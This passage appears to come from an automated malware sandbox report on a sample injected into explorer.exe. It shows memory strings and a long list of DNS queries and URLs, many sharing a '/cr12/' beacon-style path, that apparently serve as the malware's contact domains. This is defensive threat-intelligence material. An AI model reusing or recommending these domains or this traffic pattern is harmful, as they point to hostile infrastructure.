Benchmark","source":"bing","colorSamples":[{"isDarkMode":true,"hexColor":"#2E2E2E","isGreyScale":false},{"isDarkMode":false,"hexColor":"#F5F5F5","isGreyScale":false}]}],"colorSamples":[{"isDarkMode":true,"hexColor":"#253D3B","isGreyScale":false},{"isDarkMode":false,"hexColor":"#EAF5F5","isGreyScale":false}],"provider":{"id":"vid-gkg786ucfpu46xnx5n80yvfyceqwsqweke9jhc8g7a0782qsfc0a","name":"Hardware Unboxed","logoUrl":"https://www.bing.com/th?id=AR_e1aad59e9b84f32b322c4036057c9f3d"},"category":"news","reactionSummary":{"totalCount":30,"subReactionSummaries":[{"totalCount":24,"type":"upvote"},{"totalCount":6,"type":"downvote"}]},"reactionStatus":"on","commentSummary":{"totalCount":0},"commentStatus":"on","cardId":7,"reasons":[{"type":"explore","rank":0,"follow":{"id":"","name":"gaming","time":""}}],"recoId":"m9EZkeedgX5eUa-QBobFkaKzgm","source":"WebVideo"},{"id":"BB1j6YDZ","type":"video","title":"Top 10 Catchiest Songs of the 2010s","abstract":"These songs have been living rent-free in our head for years! For this list, we equals www.youtube.com (Youtube)
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: s risk-free! Hearing the word \"superacid\" may evoke memories of that scene from Breaking Bad, but perhaps counterintuitively, the strongest acid on Earth wouldn't be able to destroy your bathroom. Our previous video about the strongest acids in the world: https://www.youtube.com/watch?v=cbN37yRV-ZY Hosted by: Stefan Chin ---------- Support SciShow by becoming a patron on Patreon: https://www.patreon.com/scishow ---------- Huge thanks go to the following Patreon supporters for helping us keep SciShow free for everyone forever: Adam Brainard, Alex Hackman, Ash, Bryan Cloer, charles george, Chris Mackey, Chris Peters, Christoph Schwanke, Christopher R Boucher, Eric Jensen, Harrison Mills, Jaap Westera, Jason A, Saslow, Jeffrey Mckishen, Jeremy Mattern, Kevin Bealer, Matt Curls, Michelle Dove, Piya Shedden, Rizwan Kassim, Sam Lutfi ---------- Looking for SciShow elsewhere on the internet? SciShow Tangents Podcast: https://scishow-tangents.simplecast.com/ TikTok: https://www.tiktok.com/@scishow Twitter: http://www.twitter.com/scishow Instagram: http://instagram.com/thescishow Facebook: http://www.facebook.com/scishow #SciShow #science #education #learning #complexly ---------- Sources: https://www.acs.org/molecule-of-the-week/archive/f/fluoroantimonic-acid.html https://chem.libretexts.org/Courses/University_of_Illinois_Springfield/UIS%3A_CHE_267_-_Organic_Chemistry_I_(Morsch)/Chapters/Chapter_02%3A_Acids_and_Bases/5.1%3A_Br%C3%B8nsted%E2%80%93Lowry_Acids_and_Bases https://2012books.lardbucket.org/books/principles-of-general-chemistry-v1.0/s31-appendix-c-dissociation-consta.html https://chem.libretexts.org/Bookshelves/Introductory_Chemistry/Introductory_Chemistry_(CK-12)/21%3A_Acids_and_Bases/21.12%3A_Strong_and_Weak_Acids_and_Acid_Ionization_Constant_(K_texta) https://chem.libretexts.org/Bookshelves/Physical_and_Theoretical_Chemistry_Textbook_Maps/Supplemental_Modules_(Physical_and_Theoretical_Chemistry)/Acids_and_Bases/Ionization_Constants/Calculating_A_Ka_Value_From_A_Measured_Ph https://chem.libretexts.org/Courses/University_of_Missouri/MU%3A__1330H_(Keller)/16%3A_AcidBase_Equilibria/16.05%3A_Strong_Acids_and_Bases https://flexbooks.ck12.org/cbook/ck-12-chemistry-flexbook-2.0/section/21.12/primary/lesson/strong-and-weak-acids-and-acid-ionization-constant-ka-chem/ https://www.chem.purdue.edu/gchelp/howtosolveit/Equilibrium/Calculating_pHandpOH.htm https://www.aqion.de/site/ph-of-common-acids https://www.thoughtco.com/is-a-negative-ph-possible-603653 https://chem.libretexts.org/Bookshelves/Physical_and_Theoretical_Chemistry_Textbook_Maps/Supplemental_Modules_(Physical_and_Theoretical_Chemistry)/Acids_and_Bases/Acids_and_Bases_in_Aqueous_Solutions/The_pH_Scale https://atlas-scientific.com/blog/can-ph-probe-detect-negative-ph/ https://sciencenotes.org/the-worlds-strongest-acid-the-superacids/ https://www.chemeurope.com/en/encyclopedia/Hammett_acidity_function.html https://www2.chemistry.msu.edu/faculty/reusch/AcidBase/acid-base.html https://www.chem
          Source: explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: s risk-free! Hearing the word \"superacid\" may evoke memories of that scene from Breaking Bad, but perhaps counterintuitively, the strongest acid on Earth wouldn't be able to destroy your bathroom. Our previous video about the strongest acids in the world: https://www.youtube.com/watch?v=cbN37yRV-ZY Hosted by: Stefan Chin ---------- Support SciShow by becoming a patron on Patreon: https://www.patreon.com/scishow ---------- Huge thanks go to the following Patreon supporters for helping us keep SciShow free for everyone forever: Adam Brainard, Alex Hackman, Ash, Bryan Cloer, charles george, Chris Mackey, Chris Peters, Christoph Schwanke, Christopher R Boucher, Eric Jensen, Harrison Mills, Jaap Westera, Jason A, Saslow, Jeffrey Mckishen, Jeremy Mattern, Kevin Bealer, Matt Curls, Michelle Dove, Piya Shedden, Rizwan Kassim, Sam Lutfi ---------- Looking for SciShow elsewhere on the internet? SciShow Tangents Podcast: https://scishow-tangents.simplecast.com/ TikTok: https://www.tiktok.com/@scishow Twitter: http://www.twitter.com/scishow Instagram: http://instagram.com/thescishow Facebook: http://www.facebook.com/scishow #SciShow #science #education #learning #complexly ---------- Sources: https://www.acs.org/molecule-of-the-week/archive/f/fluoroantimonic-acid.html https://chem.libretexts.org/Courses/University_of_Illinois_Springfield/UIS%3A_CHE_267_-_Organic_Chemistry_I_(Morsch)/Chapters/Chapter_02%3A_Acids_and_Bases/5.1%3A_Br%C3%B8nsted%E2%80%93Lowry_Acids_and_Bases https://2012books.lardbucket.org/books/principles-of-general-chemistry-v1.0/s31-appendix-c-dissociation-consta.html https://chem.libretexts.org/Bookshelves/Introductory_Chemistry/Introductory_Chemistry_(CK-12)/21%3A_Acids_and_Bases/21.12%3A_Strong_and_Weak_Acids_and_Acid_Ionization_Constant_(K_texta) https://chem.libretexts.org/Bookshelves/Physical_and_Theoretical_Chemistry_Textbook_Maps/Supplemental_Modules_(Physical_and_Theoretical_Chemistry)/Acids_and_Bases/Ionization_Constants/Calculating_A_Ka_Value_From_A_Measured_Ph https://chem.libretexts.org/Courses/University_of_Missouri/MU%3A__1330H_(Keller)/16%3A_AcidBase_Equilibria/16.05%3A_Strong_Acids_and_Bases https://flexbooks.ck12.org/cbook/ck-12-chemistry-flexbook-2.0/section/21.12/primary/lesson/strong-and-weak-acids-and-acid-ionization-constant-ka-chem/ https://www.chem.purdue.edu/gchelp/howtosolveit/Equilibrium/Calculating_pHandpOH.htm https://www.aqion.de/site/ph-of-common-acids https://www.thoughtco.com/is-a-negative-ph-possible-603653 https://chem.libretexts.org/Bookshelves/Physical_and_Theoretical_Chemistry_Textbook_Maps/Supplemental_Modules_(Physical_and_Theoretical_Chemistry)/Acids_and_Bases/Acids_and_Bases_in_Aqueous_Solutions/The_pH_Scale https://atlas-scientific.com/blog/can-ph-probe-detect-negative-ph/ https://sciencenotes.org/the-worlds-strongest-acid-the-superacids/ https://www.chemeurope.com/en/encyclopedia/Hammett_acidity_function.html https://www2.chemistry.msu.edu/faculty/reusch/AcidBase/acid-base.html https://www.chem
          Source: global traffic | DNS traffic detected: DNS query: www.bolinkpass.club
          Source: global traffic | DNS traffic detected: DNS query: www.spiritualpath.info
          Source: global traffic | DNS traffic detected: DNS query: www.sugardefender24-usa.us
          Source: global traffic | DNS traffic detected: DNS query: www.nff1291.com
          Source: global traffic | DNS traffic detected: DNS query: www.henslotalt.us
          Source: global traffic | DNS traffic detected: DNS query: www.65302.vip
          Source: global traffic | DNS traffic detected: DNS query: www.lotusluxecandle.com
          Source: global traffic | DNS traffic detected: DNS query: www.carneden.com
          Source: global traffic | DNS traffic detected: DNS query: www.pedandmore.com
          Source: global traffic | DNS traffic detected: DNS query: www.junongpei.website
          Source: global traffic | DNS traffic detected: DNS query: www.winningpickleballshots.com
          Source: global traffic | DNS traffic detected: DNS query: www.thetrendingproduct.com
          Source: global traffic | DNS traffic detected: DNS query: www.veryaroma.com
          Source: global traffic | DNS traffic detected: DNS query: www.epuar.com
          Source: global traffic | DNS traffic detected: DNS query: www.warehouse-inventory-80963.bond
          Source: global traffic | DNS traffic detected: DNS query: www.jfgminimalist.com
          Source: global traffic | DNS traffic detected: DNS query: www.ferradaoffroad.com
          Source: global traffic | DNS traffic detected: DNS query: www.free-cell-phones-en-arena.sbs
          Source: global traffic | DNS traffic detected: DNS query: www.84031.vip
          Source: global traffic | DNS traffic detected: DNS query: www.footresort.com
          Source: global traffic | DNS traffic detected: DNS query: www.priuswuxi.com
          Source: explorer.exe, 00000006.00000000.30301220528.000000000C63B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229369761.000000000C63B000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
          Source: explorer.exe, 00000006.00000003.32856171565.0000000008FDA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31961855101.0000000008FDA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30297542388.0000000008FDA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35224772424.0000000008FDA000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicer
          Source: explorer.exe, 00000006.00000000.30301220528.000000000C63B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229369761.000000000C63B000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://instagram.com/thescishow
          Source: explorer.exe, 00000006.00000000.30301220528.000000000C63B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229369761.000000000C63B000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUgUABBQ
          Source: explorer.exe, 00000006.00000000.30301220528.000000000C63B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229369761.000000000C63B000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
          Source: explorer.exe, 00000006.00000003.32856171565.0000000008FDA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31961855101.0000000008FDA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30297542388.0000000008FDA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35224772424.0000000008FDA000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0:
          Source: explorer.exe, 00000006.00000002.35227465445.000000000A590000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.35227096684.0000000009FB0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.35221059449.0000000002B10000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://schemas.micro
          Source: yPURXYpFVuXra2o.exe, 00000003.00000002.32566392744.0000000002F81000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: yPURXYpFVuXra2o.exe | String found in binary or memory: http://tempuri.org/dsGeneral.xsd
          Source: yPURXYpFVuXra2o.exe | String found in binary or memory: http://tempuri.org/dsGeneral2.xsd
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://twitter.com/hardwareunboxed
          Source: explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.65302.vip
          Source: explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.65302.vip/cr12/
          Source: explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.65302.vip/cr12/www.lotusluxecandle.com
          Source: explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.65302.vipReferer:
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.84031.vip
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.84031.vip/cr12/
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.84031.vip/cr12/www.lotusluxecandle.com
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.84031.vipReferer:
          Source: explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.bolinkpass.club
          Source: explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.bolinkpass.club/cr12/
          Source: explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.bolinkpass.club/cr12/www.spiritualpath.info
          Source: explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.bolinkpass.clubReferer:
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.carneden.com
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.carneden.com/cr12/
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.carneden.com/cr12/www.pedandmore.com
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.carneden.comReferer:
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.epuar.com
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.epuar.com/cr12/
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.epuar.com/cr12/www.warehouse-inventory-80963.bond
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.epuar.comReferer:
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.ferradaoffroad.com
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.ferradaoffroad.com/cr12/
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.ferradaoffroad.com/cr12/www.free-cell-phones-en-arena.sbs
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.ferradaoffroad.comReferer:
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.footresort.com
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.footresort.com/cr12/
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.footresort.com/cr12/www.priuswuxi.com
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.footresort.comReferer:
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.free-cell-phones-en-arena.sbs
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.free-cell-phones-en-arena.sbs/cr12/
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.free-cell-phones-en-arena.sbs/cr12/www.84031.vip
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.free-cell-phones-en-arena.sbsReferer:
          Source: explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.henslotalt.us
          Source: explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.henslotalt.us/cr12/
          Source: explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.henslotalt.us/cr12/www.ptwix.xyz
          Source: explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.henslotalt.usReferer:
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.jfgminimalist.com
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.jfgminimalist.com/cr12/
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.jfgminimalist.com/cr12/www.ferradaoffroad.com
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.jfgminimalist.comReferer:
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.junongpei.website
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.junongpei.website/cr12/
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.junongpei.website/cr12/www.winningpickleballshots.com
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.junongpei.websiteReferer:
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.lotusluxecandle.com
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.lotusluxecandle.com/cr12/
          Source: explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.lotusluxecandle.com/cr12/www.carneden.com
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.lotusluxecandle.com/cr12/www.ptwix.xyz
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.lotusluxecandle.comReferer:
          Source: explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.nff1291.com
          Source: explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.nff1291.com/cr12/
          Source: explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.nff1291.com/cr12/www.henslotalt.us
          Source: explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.nff1291.comReferer:
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.pedandmore.com
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.pedandmore.com/cr12/
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.pedandmore.com/cr12/www.junongpei.website
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.pedandmore.comReferer:
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.priuswuxi.com
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.priuswuxi.com/cr12/
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.priuswuxi.com/cr12/www.carneden.com
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.priuswuxi.comReferer:
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.ptwix.xyz
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.ptwix.xyz/cr12/
          Source: explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.ptwix.xyz/cr12/www.65302.vip
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.ptwix.xyz/cr12/www.footresort.com
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.ptwix.xyzReferer:
          Source: explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.spiritualpath.info
          Source: explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.spiritualpath.info/cr12/
          Source: explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.spiritualpath.info/cr12/www.sugardefender24-usa.us
          Source: explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.spiritualpath.infoReferer:
          Source: explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.sugardefender24-usa.us
          Source: explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.sugardefender24-usa.us/cr12/
          Source: explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.sugardefender24-usa.us/cr12/www.nff1291.com
          Source: explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.sugardefender24-usa.usReferer:
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.thetrendingproduct.com
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.thetrendingproduct.com/cr12/
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.thetrendingproduct.com/cr12/www.veryaroma.com
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.thetrendingproduct.comReferer:
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.twitter.com/scishow
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.veryaroma.com
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.veryaroma.com/cr12/
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.veryaroma.com/cr12/www.epuar.com
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.veryaroma.comReferer:
